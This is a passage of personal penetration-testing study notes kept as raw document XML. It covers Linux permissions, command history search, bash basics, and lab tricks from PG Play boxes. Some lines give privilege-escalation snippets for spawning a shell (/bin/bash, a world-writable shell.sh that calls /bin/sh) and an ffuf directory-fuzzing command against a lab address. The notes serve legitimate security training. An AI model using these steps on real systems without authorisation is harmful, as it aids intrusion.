            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image60.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId112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33B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="330"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from Tib3rius course. Video is "Understanding Permissions in Linux "</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="330"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This explains the difference between Real, Effective, and Saved UID/GID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="330"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Effective ID is the one mostly used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033B6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033B7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_oion7bld48iv" w:id="461"/>
      <w:bookmarkEnd w:id="461"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033B8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1447800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="510" name="image486.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image486.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId112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33B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1386"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is what a normal /home directory looks like</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033BA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033BB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pznzojfq9acs" w:id="462"/>
      <w:bookmarkEnd w:id="462"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Other things to know about Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033BC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033BD">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL + R</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="256"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse search</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="256"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Searches through your command history </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="256"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL + R</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> again to toggle through next most recent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033C1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033C3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4339675" cy="3414713"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="436" name="image421.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image421.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1127"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4339675" cy="34147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3C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1449"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the ICMP PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1449"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It shows that even if you don't have permissions to list the files inside of a directory (devel), you can still name permissions of a specific file within that directory by specifying the file in the command (devel/crypt.php). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1449"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, they used the "cat" command to read it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1449"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also use this to check whether a file exists within a protected directory</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033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CA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033CB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1y5x8t4s5p8o" w:id="463"/>
      <w:bookmarkEnd w:id="463"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033CC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033CD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to run commands using bash:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1426"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash -c "whoami"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033CF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033D0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to run files using bash:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash example.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033D2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033D3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the Bash Signature or "Shebang" at the top of Bash Scripts to tell system that you want Bash Interpreter to run this. It is more important than the file extension. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1440"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1440"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And alternatively, if you wanted python, you would do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1440"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033D7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033D8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you ever are able to run Bash or a bash file, just put this to get a shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or if you have a file do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1301"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1301"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo '/bin/sh' &gt; shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1301"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 777 shell.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033DE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6mk60137xcbk" w:id="464"/>
      <w:bookmarkEnd w:id="464"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fuzzing web directories with bash scripting</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033DF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1128">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Pwned1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, we got a .dic (dictionary) file that contained what looked like a list of directory names. If we get a dictionary file like that, it's always a good idea to try fuzzing web directories with it. In this writeup, they wrote a bash script, but they could have very much easily used ffuf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="557"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u http://192.168.213.95/FUZZ -w dictionary.txt </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033E3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="355600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="203" name="image203.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image203.png"/>
